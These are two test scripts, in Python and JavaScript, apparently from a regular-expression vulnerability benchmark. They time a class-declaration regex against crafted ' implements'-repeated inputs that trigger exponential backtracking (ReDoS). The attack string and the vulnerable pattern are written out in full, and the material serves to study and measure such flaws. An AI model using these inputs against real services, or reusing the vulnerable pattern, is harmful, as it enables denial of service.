File: regexlib/python_re_test_file/regexlib_1726.py
# 1726
# class\s+([a-z0-9_]+)(?:\s+extends\s+[a-z0-9_]+)?(?:\s+implements\s+(?:[a-z0-9_]+\s*,*\s*)+)?\s*\{
# EXPONENT
# nums:4
# EXPONENT AttackString:"class a"+" implements"*4+"!_1SLQ_2"

import re
from time import perf_counter

regex = """class\s+([a-z0-9_]+)(?:\s+extends\s+[a-z0-9_]+)?(?:\s+implements\s+(?:[a-z0-9_]+\s*,*\s*)+)?\s*\{"""
REGEX = re.compile(regex)
for i in range(0, 150000):
    ATTACK = "class a" + " implements" * i * 1 + "!_1SLQ_2"
    LEN = len(ATTACK)
    BEGIN = perf_counter()
    m = REGEX.search(ATTACK)
    # m = REGEX.match(ATTACK)
    DURATION = perf_counter() - BEGIN
    print(f"{i *1}: took {DURATION} seconds!")

File: regexlib/2021-5-15/javascript_test_file/regexlib_1726.js
/* 1726
 * class\s+([a-z0-9_]+)(?:\s+extends\s+[a-z0-9_]+)?(?:\s+implements\s+(?:[a-z0-9_]+\s*,*\s*)+)?\s*\{
 * EXPONENT
 * nums:3
 * EXPONENT AttackString:"class a"+" implements"*4+"!_1SLQ_2"
 */
var REGEX = /class\s+([a-z0-9_]+)(?:\s+extends\s+[a-z0-9_]+)?(?:\s+implements\s+(?:[a-z0-9_]+\s*,*\s*)+)?\s*\{/
for(var i = 1; i <= 5000000; i++) {
    var time = Date.now();
    var attack_str = 'class a' + ' implements'.repeat(i*1) + '!_1SLQ_2'
    REGEX.exec(attack_str)
    // REGEX.test(attack_str);
    // attack_str.search(REGEX)
    // attack_str.match(REGEX)
    var time_cost = Date.now() - time;
    console.log(i * 1 + ": " + time_cost+" ms")
}